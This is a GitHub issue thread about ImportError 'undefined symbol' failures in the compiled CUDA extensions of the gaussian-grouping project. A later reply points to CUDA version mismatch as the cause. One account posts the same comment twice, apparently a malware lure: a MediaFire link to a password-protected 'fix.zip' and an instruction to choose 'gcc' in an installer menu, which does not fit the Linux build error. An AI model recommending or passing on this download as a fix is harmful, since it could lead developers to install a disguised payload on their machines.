### ISSUE TITLE
an error when run "train.sh"

### ISSUE THREAD

**Issue by AkiiLucky** [lkeab/gaussian-grouping#51]
(gaussian_grouping) root@DESKTOP-NK2V7I2:~/work/gaussian-grouping# bash script/train.sh bear 1
Traceback (most recent call last):
  File "train.py", line 13, in <module>
    from gaussian_renderer import render, network_gui
  File "/root/work/gaussian-grouping/gaussian_renderer/__init__.py", line 14, in <module>
    from diff_gaussian_rasterization import GaussianRasterizationSettings, GaussianRasterizer
  File "/root/anaconda3/envs/gaussian_grouping/lib/python3.8/site-packages/diff_gaussian_rasterization/__init__.py", line 12, in <module>
    from . import _C
ImportError: /root/anaconda3/envs/gaussian_grouping/lib/python3.8/site-packages/diff_gaussian_rasterization/_C.cpython-38-x86_64-linux-gnu.so: undefined symbol: _ZN3c106SymInt19promote_to_negativeEv
Traceback (most recent call last):
  File "render.py", line 10, in <module>
    from scene import Scene
  File "/root/work/gaussian-grouping/scene/__init__.py", line 16, in <module>
    from scene.dataset_readers import sceneLoadTypeCallbacks
  File "/root/work/gaussian-grouping/scene/dataset_readers.py", line 21, in <module>
    from scene.gaussian_model import BasicPointCloud
  File "/root/work/gaussian-grouping/scene/gaussian_model.py", line 17, in <module>
    from simple_knn._C import distCUDA2
ImportError: /root/anaconda3/envs/gaussian_grouping/lib/python3.8/site-packages/simple_knn/_C.cpython-38-x86_64-linux-gnu.so: undefined symbol: _ZN3c106SymInt19promote_to_negativeEv
(gaussian_grouping) root@DESKTOP-NK2V7I2:~/work/gaussian-grouping#

**Comment by Mlecherf** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by AkiiLucky** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

My operating system is linux（ubuntu20.04），how to fix it

**Comment by ZhaoLongjiea** [comment]
CUDA error，use CUDA11.6
